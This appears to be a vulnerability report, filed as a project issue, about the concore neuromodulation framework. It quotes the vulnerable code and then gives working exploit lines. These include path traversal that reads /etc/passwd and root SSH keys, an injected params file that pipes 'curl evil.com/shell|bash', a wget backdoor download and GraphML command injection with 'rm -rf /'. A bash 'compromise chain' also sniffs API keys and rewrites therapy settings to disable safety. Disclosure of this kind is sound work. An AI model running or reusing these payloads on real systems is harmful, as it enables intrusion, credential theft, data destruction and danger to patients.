Multiple RCE and Path Traversal Vulnerabilities in CONTROL-CORE Medical Framework - Patient Safety Risk #524
Description
EXECUTIVE SUMMARY
The CONTROL-CORE (concore) neuromodulation framework contains multiple critical vulnerabilities enabling remote code execution, arbitrary file access, and medical device compromise. These flaws affect all implementations and pose immediate patient safety risks.
Location: concore/concore.py:223,290,293
# VULNERABLE CODE
file_path = os.path.join(inpath+str(file_port_num), name)
file_path = os.path.join("../"+port_identifier, name)Exploit:
concore.read(1, "../../../etc/passwd", "")
concore.write(1, "../../../tmp/backdoor.py", "import os;os.system('rm -rf /')")Location: concore/concore.py:149,256,323
# VULNERABLE CODE
params = literal_eval(sparams)
inval = literal_eval(ins)Exploit:
# Create malicious concore.params
echo "__import__('os').system('curl evil.com/shell|bash')" > ./in1/concore.paramsLocation: concore/mkconcore.py:615-680
# VULNERABLE CODE
fbuild.write("mkdir docker-"+dockername+"\n")
fbuild.write("cp ../src/"+sourcecode+" .\n")Exploit:
<!-- Malicious GraphML -->
<node id="n1"><data key="d0">evil; rm -rf /; echo pwned:</data></node>Location: concore/tools/pwrap.py:13,85
# VULNERABLE CODE
apikey=open(concore.inpath+'1/concore.apikey').readline()
r = requests.post('http://www.controlcore.org/ctl/'+apikey, files=f)
print(apikey) # Logged in plaintextLocation: concore/concore.py:38,75
# VULNERABLE CODE - No encryption
self.socket.bind("tcp://*:5555") # Binds to all interfaces
# All ZeroMQ traffic in plaintextLocation: concore/concore.hpp:136,355
// VULNERABLE CODE
shmId_create = shmget(key, 256, IPC_CREAT | 0666); // World-writable
std::string message(sharedData_get, strnlen(sharedData_get, 256)); // No bounds checkComplete System Compromise Chain
#!/bin/bash
# 1. Path traversal to read SSH keys
python3 -c "import concore; print(concore.read(1, '../../../root/.ssh/id_rsa', ''))"
# 2. Code injection via params file
echo "__import__('subprocess').call(['wget','http://evil.com/backdoor.py','-O','/tmp/b.py'])" > ./in1/concore.params
# 3. Command injection via GraphML
cat > malicious.graphml << EOF
<graphml><node id="n1"><data key="d0">test; curl evil.com/shell.sh|bash; echo normal</data></node></graphml>
EOF
# 4. API key theft via network interception
tcpdump -i any host controlcore.org -A | grep -E "(apikey|authorization)"
# 5. Medical device parameter manipulation
python3 -c "import concore; concore.write(1, '../../../etc/medical/therapy.conf', 'amplitude=999999\nsafety_disabled=true')"